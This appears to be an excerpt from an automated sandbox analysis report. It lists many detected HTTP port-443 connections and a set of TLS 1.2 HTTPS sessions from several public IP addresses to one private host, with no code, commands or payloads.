Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49944
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49943
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49788
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49787
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49786
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49785
Source: unknown	Network traffic detected: HTTP traffic on port 49922 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49784
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49783
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49782
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49781
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49780
Source: unknown	Network traffic detected: HTTP traffic on port 49968 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50187 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50221 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49807 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49713 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49759 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49779
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49778
Source: unknown	Network traffic detected: HTTP traffic on port 50347 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49777
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49776
Source: unknown	Network traffic detected: HTTP traffic on port 50335 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49775
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49774
Source: unknown	Network traffic detected: HTTP traffic on port 49862 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49773
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49772
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49771
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49770
Source: unknown	Network traffic detected: HTTP traffic on port 50407 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49830 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50155 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49991 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49769
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49768
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49767
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49766
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49765
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49764
Source: unknown	Network traffic detected: HTTP traffic on port 50313 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49763
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49762
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49761
Source: unknown	Network traffic detected: HTTP traffic on port 50143 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49760
Source: unknown	Network traffic detected: HTTP traffic on port 49840 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49725 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50208 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49896 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49770 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49956 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49759
Source: unknown	Network traffic detected: HTTP traffic on port 50083 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49758
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49757
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49999
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49756
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49998
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49755
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49997
Source: unknown	Network traffic detected: HTTP traffic on port 50121 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49754
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49996
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49753
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49995
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49752
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49994
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49751
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49993
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49750
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49992
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49991
Source: unknown	Network traffic detected: HTTP traffic on port 49786 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49874 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49747 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49829 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49934 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49749
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49748
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49747
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49989
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49746
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49988
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49745
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49987
Source: unknown	Network traffic detected: HTTP traffic on port 50277 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50337
Source: unknown	Network traffic detected: HTTP traffic on port 50420 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50036 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50386 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50331
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50332
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50335
Source: unknown	Network traffic detected: HTTP traffic on port 49769 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49803 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50071 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50305 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49849 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49900 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50348
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50347
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50349
Source: unknown	Network traffic detected: HTTP traffic on port 50505 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49837 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49711 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49929 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50100
Source: unknown	Network traffic detected: HTTP traffic on port 49872 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50344
Source: unknown	Network traffic detected: HTTP traffic on port 50243 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50345
Source: unknown	Network traffic detected: HTTP traffic on port 49964 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50128 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49798 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49735 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50117
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50359
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50358
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50119
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50118
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50351
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50350
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50353
Source: unknown	Network traffic detected: HTTP traffic on port 49930 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50113
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50355
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50112
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50354
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50115
Source: unknown	Network traffic detected: HTTP traffic on port 50374 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50114
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50356
Source: unknown	Network traffic detected: HTTP traffic on port 49745 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49986 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49850 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50175 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50213 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49799
Source: unknown	Network traffic detected: HTTP traffic on port 49757 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50128
Source: unknown	Network traffic detected: HTTP traffic on port 50419 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49798
Source: unknown	Network traffic detected: HTTP traffic on port 50012 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50127
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49797
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49796
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50129
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49795
Source: unknown	Network traffic detected: HTTP traffic on port 49952 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49794
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49793
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49792
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49791
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50120
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50362
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49790
Source: unknown	Network traffic detected: HTTP traffic on port 50093 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50361
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50122
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50121
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50363
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50123
Source: unknown	Network traffic detected: HTTP traffic on port 49723 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50048 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49825 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49884 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49907 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49789
Source: unknown	Network traffic detected: HTTP traffic on port 49733 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49779 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49859 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49894 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50350 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50410 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49942 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50362 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50305
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50308
Source: unknown	Network traffic detected: HTTP traffic on port 49919 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49954 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50309
Source: unknown	Network traffic detected: HTTP traffic on port 49788 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49988 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50201 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49767 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49721 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49827 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49882 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50141 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50314
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50316
Source: unknown	Network traffic detected: HTTP traffic on port 49976 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50319
Source: unknown	Network traffic detected: HTTP traffic on port 50118 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49815 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50313
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50312
Source: unknown	Network traffic detected: HTTP traffic on port 50163 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49860 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50349 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49755 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50325
Source: unknown	Network traffic detected: HTTP traffic on port 49998 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50328
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50329
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50320
Source: unknown	Network traffic detected: HTTP traffic on port 50058 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50324
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50323
Source: unknown	Network traffic detected: HTTP traffic on port 49920 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49926 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50054
Source: unknown	Network traffic detected: HTTP traffic on port 49789 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49766 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50058
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50057
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50059
Source: unknown	Network traffic detected: HTTP traffic on port 49961 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49720 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50063
Source: unknown	Network traffic detected: HTTP traffic on port 50045 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50389 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49732 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50148 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50067
Source: unknown	Network traffic detected: HTTP traffic on port 50377 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50066
Source: unknown	Network traffic detected: HTTP traffic on port 50331 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50069
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50068
Source: unknown	Network traffic detected: HTTP traffic on port 50205 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50240 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50183 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50070
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50071
Source: unknown	Network traffic detected: HTTP traffic on port 49823 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50073
Source: unknown	Network traffic detected: HTTP traffic on port 50308 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49790 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49869 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49674 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50195 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50057 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50077
Source: unknown	Network traffic detected: HTTP traffic on port 50114 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49892 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50083
Source: unknown	Network traffic detected: HTTP traffic on port 49904 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49847 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49870 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50092
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50091
Source: unknown	Network traffic detected: HTTP traffic on port 50136 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49983 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50093
Source: unknown	Network traffic detected: HTTP traffic on port 49938 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50023 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49811 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49754 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50018
Source: unknown	Network traffic detected: HTTP traffic on port 50193 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50019
Source: unknown	Network traffic detected: HTTP traffic on port 49813 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49951 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50424 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50010
Source: unknown	Network traffic detected: HTTP traffic on port 49916 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50012
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50254
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50011
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50495
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50013
Source: unknown	Network traffic detected: HTTP traffic on port 50353 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50015
Source: unknown	Network traffic detected: HTTP traffic on port 50161 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49776 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49845 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50021
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50263
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50020
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50262
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50023
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50022
Source: unknown	Network traffic detected: HTTP traffic on port 49742 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50027
Source: unknown	Network traffic detected: HTTP traffic on port 49879 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49780 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49985 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50021 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50138 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50271
Source: unknown	Network traffic detected: HTTP traffic on port 50067 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49995 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50011 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49928 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50032
Source: unknown	Network traffic detected: HTTP traffic on port 49857 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50033
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50036
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50277
Source: unknown	Network traffic detected: HTTP traffic on port 49764 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49719 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50242 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49801 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50041
Source: unknown	Network traffic detected: HTTP traffic on port 50412 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50040
Source: unknown	Network traffic detected: HTTP traffic on port 49973 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49730 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50033 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50043
Source: unknown	Network traffic detected: HTTP traffic on port 49835 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50045
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50044
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50047
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50048
Source: unknown	Network traffic detected: HTTP traffic on port 49880 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50292
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50051
Source: unknown	Network traffic detected: HTTP traffic on port 49792 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49890 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50122 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49912 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49958 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49889 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50018 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50461 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50077 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49855 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49981 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49752 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50237 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50380 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49924 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49729 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49831 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50156 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50043 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50402 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50100 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50345 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49774 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49782 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49740 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50379 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50207 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50323 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49808 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50006 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49867 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50495 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49865 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49942
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49941
Source: unknown	Network traffic detected: HTTP traffic on port 50229 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49727 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50112 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49762 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50158 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50404 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50399 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49833 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49939
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49938
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49937
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49936
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49935
Source: unknown	Network traffic detected: HTTP traffic on port 49902 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49934
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49933
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49932
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49931
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49930
Source: unknown	Network traffic detected: HTTP traffic on port 49971 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49794 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49936 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49929
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49928
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49927
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49926
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49924
Source: unknown	Network traffic detected: HTTP traffic on port 50250 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49923
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49922
Source: unknown	Network traffic detected: HTTP traffic on port 49739 -> 443

Source: unknown	HTTPS traffic detected: 40.126.32.74:443 -> 192.168.2.5:49713 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 40.115.3.253:443 -> 192.168.2.5:49714 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 40.115.3.253:443 -> 192.168.2.5:49718 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 13.107.246.45:443 -> 192.168.2.5:49720 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 40.115.3.253:443 -> 192.168.2.5:49721 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 40.115.3.253:443 -> 192.168.2.5:49743 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 4.245.163.56:443 -> 192.168.2.5:49758 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 40.115.3.253:443 -> 192.168.2.5:49759 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 40.115.3.253:443 -> 192.168.2.5:49811 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 13.107.246.45:443 -> 192.168.2.5:49818 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 13.107.246.45:443 -> 192.168.2.5:49819 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 13.107.246.45:443 -> 192.168.2.5:49821 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 13.107.246.45:443 -> 192.168.2.5:49822 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 13.107.246.45:443 -> 192.168.2.5:49823 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 40.115.3.253:443 -> 192.168.2.5:49820 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 40.115.3.253:443 -> 192.168.2.5:49922 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 4.245.163.56:443 -> 192.168.2.5:49948 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 40.115.3.253:443 -> 192.168.2.5:49973 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 13.107.246.45:443 -> 192.168.2.5:49983 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.5.155:443 -> 192.168.2.5:49999 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.5.155:443 -> 192.168.2.5:50001 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.5:50003 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.5.155:443 -> 192.168.2.5:50005 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 40.126.32.74:443 -> 192.168.2.5:50004 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.5:50006 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.5.155:443 -> 192.168.2.5:50007 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.5:50009 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 40.115.3.253:443 -> 192.168.2.5:50010 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.5.155:443 -> 192.168.2.5:50011 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.5:50012 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.5.155:443 -> 192.168.2.5:50013 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.5:50015 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.5.155:443 -> 192.168.2.5:50018 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.5:50019 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.5.155:443 -> 192.168.2.5:50020 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.5:50021 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.5.155:443 -> 192.168.2.5:50022 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.5.155:443 -> 192.168.2.5:50023 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.5.155:443 -> 192.168.2.5:50027 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.5.155:443 -> 192.168.2.5:50032 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.5:50033 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 40.115.3.253:443 -> 192.168.2.5:50036 version: TLS 1.2
